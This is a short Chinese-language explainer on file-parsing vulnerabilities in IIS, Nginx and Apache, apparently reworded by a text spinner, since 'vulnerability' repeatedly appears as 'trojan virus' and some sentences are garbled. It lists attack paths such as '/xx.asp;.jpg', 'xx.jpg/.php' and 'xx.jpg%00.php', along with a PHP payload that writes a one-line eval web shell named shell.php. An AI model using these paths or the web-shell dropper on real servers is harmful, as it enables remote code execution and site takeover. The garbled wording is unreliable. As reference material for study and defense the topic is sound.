漏洞解析

0x01 IIS 5.x/6.0分析木马病毒

运用方式有二种：

1.文件名分析

/xx.asp/xx.jpg 

2.文档分析

/xx.asp;.jpg

IIS6.0不容易把上边的文档作为jpg格式文档解决，只是当做了asp文件

wooyun上的IIS 6.0分析漏洞利用实例:

http://www.wooyun.org/searchbug.php?q=IIS6.0

0x02 IIS7.0/IIS7.5/Nginx<8.03 分析木马病毒

这一木马病毒是80sec探讨出去的，见

1.http://www.80sec.com/nginx-securit.html

2.http://www.laruence.com/2010/05/20/1495.html

在初始Fast-CGI打开情况下,发送1个姓名为xx.jpg，內容为

[php] view plaincopy在CODE上查询编码片派生到我的编码片

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>  的文档，随后浏览xx.jpg/.php,在这一文件名下就会转化成一句话木马 shell.php

0x03 Nginx < 8.03空字节代码执行木马病毒

Ngnix在照片中其列入PHP编码随后根据浏览：

xx.jpg%00.php

来实行列举的编码

Nginx 空字节代实行木马病毒实例：

http://www.wooyun.org/searchbug.php?q=%2500.php

0x04 Apache分析木马病毒

Apache 是从右到左开使分辨分析,假如为不能鉴别分析,就再往左分辨.

例如 xx.php.owf.rar “.owf”和”.rar” 这二种尾缀是apache不能鉴别分析,apache就会把xx.php.owf.rar分析成xx.php

0x05 参照

http://drops.wooyun.org/papers/539